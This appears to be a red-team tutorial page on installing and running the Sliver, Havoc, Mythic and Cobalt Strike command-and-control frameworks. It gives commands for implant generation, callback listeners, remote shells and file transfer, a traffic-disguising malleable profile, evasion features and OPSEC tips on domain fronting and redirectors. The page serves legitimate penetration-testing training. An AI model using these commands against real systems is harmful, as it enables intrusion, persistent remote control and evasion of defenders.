C2 Framework Setup
#Overview
Command and Control (C2) frameworks manage implants, orchestrate post-exploitation, and maintain persistent access. This section covers setup and operation of four major C2 frameworks used in red team engagements.
#Framework Comparison
| Feature | Sliver | Havoc | Mythic | Cobalt Strike |
|---|---|---|---|---|
| License | Open source | Open source | Open source | Commercial |
| Cost | Free | Free | Free | $3,500+/yr |
| Language | Go | C/C++ | Python/Docker | Java |
| Implants | Cross-platform | Windows (Demon) | Multiple agents | Windows (Beacon) |
| Protocol | mTLS, WireGuard, HTTP(S), DNS | HTTP(S), SMB | HTTP(S), TCP | HTTP(S), SMB, DNS |
| UI | CLI + Web | Qt GUI | Web | Java GUI |
| WireGuard | Built-in | No | Via agent | No |
#Sliver
Sliver is an open-source C2 framework by BishopFox with built-in WireGuard tunneling, making it ideal for red team infrastructure.
#Installation
# Install Sliver server
curl -sL https://sliver.sh/server | sudo bash
# Install Sliver client
curl -sL https://sliver.sh/client | bash
# Start server
sudo sliver-server
# In the server console, generate operator config
operators --new you --lhost <server_ip>
# This creates a file: you_<random>.cfg
# On your operator machine:
sliver-client import ./you_<random>.cfg
sliver-client
BASH
#Listeners
# Start a mutual TLS (mTLS) listener
sliver > mtls --lhost 0.0.0.0 --lport 4444
# Start an HTTPS listener
sliver > https --lhost 0.0.0.0 --lport 443 --domain c2.example.com --cert /tmp/cert.pem --key /tmp/key.pem
# Start a DNS listener
sliver > dns --lhost 0.0.0.0 --lport 53 --domains c2.example.com
# Start a WireGuard C2 tunnel
sliver > wg --lhost 0.0.0.0 --lport 51820
BASH
#Implant Generation
# Generate a Windows implant (staged)
sliver > generate --mtls <server_ip>:4444 --os windows --arch 64bit --format exe --save /tmp/
# Generate a Linux implant
sliver > generate --mtls <server_ip>:4444 --os linux --arch 64bit --format elf --save /tmp/
# Generate stageless implant (no staging server needed)
sliver > generate --mtls <server_ip>:4444 --os windows --arch 64bit --format exe --save /tmp/ --skip-symbols
# Generate with HTTP(S) callback
sliver > generate --https <server_ip>:443 --os windows --arch 64bit --format exe --save /tmp/
# Generate with DNS callback
sliver > generate --dns c2.example.com --os windows --arch 64bit --format exe --save /tmp/
# Generate with WireGuard (creates a WireGuard tunnel for C2)
sliver > generate --wg <server_ip>:51820 --os windows --arch 64bit --format exe --save /tmp/
BASH
#Session Management
# List active sessions
sliver > sessions
# Interact with a session
sliver > use <session_id>
# In a session:
sliver (SESSION) > shell # Interactive shell
sliver (SESSION) > execute -c <command> # Run command
sliver (SESSION) > upload <local> <remote> # Upload file
sliver (SESSION) > download <remote> # Download file
sliver (SESSION) > ps # List processes
sliver (SESSION) > migrate <pid> # Migrate to another process
sliver (SESSION) > getuid # Current user
sliver (SESSION) > ifconfig # Network interfaces
BASH
#WireGuard C2 Tunnel
Sliver's unique feature: WireGuard-based C2 provides a full VPN tunnel to the implant's network.
# Start WireGuard listener
sliver > wg --lhost 0.0.0.0 --lport 51820
# Generate WireGuard implant
sliver > generate --wg <server_ip>:51820 --os windows --arch 64bit --format exe --save /tmp/
# After the implant connects, you get a WireGuard tunnel interface
# View the tunnel
sliver > wg-config
# This outputs a WireGuard config you can use to create a local tunnel:
sudo wg-quick up ./wg0.conf
# Now you can reach the implant's network directly
nmap -sn 172.16.0.0/24
BASH
#Havoc
Havoc is a modern open-source C2 framework with a Qt GUI and focus on evasion.
#Installation
# Build from source
git clone https://github.com/HavocFramework/Havoc.git
cd Havoc
make
# Start team server
./havoc server --profile ./profiles/server.yml
# Start client (GUI)
./havoc client
# Or use Docker
docker run -it -p 4444:4444 -p 8080:8080 havocframework/havoc:latest
BASH
#Demon Agent
# Generate Demon agent (Windows implant) from Havoc GUI:
# 1. Go to "Attack" → "Generate Agent"
# 2. Select "Demon" agent
# 3. Configure callback host, port, and protocol
# 4. Generate
# Or via CLI:
havoc client --generate --agent demon --host <server_ip> --port 4444 --protocol https
BASH
#Key Features
- Sleep obfuscation: Encrypt memory during sleep periods
- Syscall support: Direct syscalls for API unhooking
- ETW patching: Disable Event Tracing for Windows
- AMSI bypass: Built-in AMSI bypass techniques
- Injection methods: Spawn and inject, thread hijacking
#Mythic
Mythic is a C2 framework built on Docker with a web-based UI and support for multiple agent types.
#Installation
# Clone Mythic
git clone https://github.com/its-a-feature/Mythic.git
cd Mythic
# Install
sudo ./install_docker_ubuntu.sh
# Start Mythic
sudo ./mythic-cli start
# Access web UI: https://localhost:7443
# Default: mythic_admin / <password from install>
BASH
#Installing Agents
# List available agents
sudo ./mythic-cli agents list
# Install Apollo (Windows agent)
sudo ./mythic-cli install github https://github.com/MythicAgents/Apollo.git
# Install Mercury (Linux agent)
sudo ./mythic-cli install github https://github.com/MythicAgents/Mercury.git
# Install Poseidon (macOS/Linux agent)
sudo ./mythic-cli install github https://github.com/MythicAgents/Poseidon.git
# Install services (for redirectors)
sudo ./mythic-cli install github https://github.com/MythicServices/http.git
BASH
#Payload Generation
# In the Mythic web UI:
# 1. Go to "Create Payload"
# 2. Select agent type (Apollo, Mercury, Poseidon)
# 3. Configure:
# - Callback host: your redirector domain
# - Callback port: 443
# - Encryption key: auto-generated
# - Sleep interval: 60s with jitter 0.2
# 4. Select output format: exe, shellcode, dll
# 5. Generate
TEXT
#Cobalt Strike
Cobalt Strike is the commercial standard for red team operations. It's the most mature C2 framework with extensive community resources.
#Setup
# Start team server
./teamserver <server_ip> <password> [C2 profile] [kill date]
# Example:
./teamserver 10.10.10.10 P@ssw0rd! ./profiles/normal.profile 2026-12-31
# Start client (Java GUI)
./cobaltstrike
# Connect to team server
# Host: 10.10.10.10
# Password: P@ssw0rd!
# User: operator1
BASH
#Malleable C2 Profile
Malleable C2 profiles control how Beacon traffic looks on the wire.
# Example profile snippet (Amazon disguise)
set sleeptime "60000"; # 60 second sleep
set jitter "20"; # 20% jitter
set useragent "Mozilla/5.0 ...";
http-get {
set uri "/s/ref=lm_ss_sub_yo";
client {
header "Accept" "*/*";
header "Host" "www.amazon.com";
metadata {
base64url;
prepend "session-token=";
header "Cookie";
}
}
server {
header "Server" "Server";
header "X-Amz-Id-2" "...";
output {
print;
}
}
}
TEXT
#Key Commands
# Listener
beacon> link <pipename> # SMB beacon
beacon> spawn <listener> # Spawn new beacon
beacon> shell <command> # Run shell command
beacon> upload <file> # Upload file
beacon> download <file> # Download file
beacon> ps # List processes
beacon> migrate <pid> # Migrate to process
beacon> portscan <hosts> <ports> # Port scan
beacon> socks <port> # SOCKS proxy
beacon> rportfwd <bind> <fwdhost> <fwdport> # Reverse port forward
TEXT
#Common Pitfalls
- Team server exposure: Never expose the team server directly to the internet. Always use redirectors.
- Default profiles: Default C2 profiles are fingerprinted by EDR/NDR. Always use custom malleable profiles.
- Time synchronization: C2 servers and implants must have accurate time for TLS and authentication.
- Certificate management: Use valid TLS certificates (Let's Encrypt, not self-signed) for HTTPS listeners.
- Beacon timing: Fixed beacon intervals are easy to detect. Always use jitter.
#OPSEC Considerations
- Use redirectors between the target and the team server — never expose the team server IP
- Rotate infrastructure regularly (every 48-72 hours for long engagements)
- Use domain fronting to hide the real C2 domain from network monitoring
- Custom malleable C2 profiles blend Beacon traffic with legitimate web traffic
- DNS C2 generates unusual query patterns — use only when necessary
- WireGuard C2 (Sliver) provides encrypted tunneling but creates a visible TUN interface
#Cross-References
- Redirectors & Fronting — Protect the team server with redirectors
- Payload Staging — Staged vs stageless payload delivery
- Cloud Tunnels — Cloudflare Tunnel for C2
- 10 - Persistence — C2 implant persistence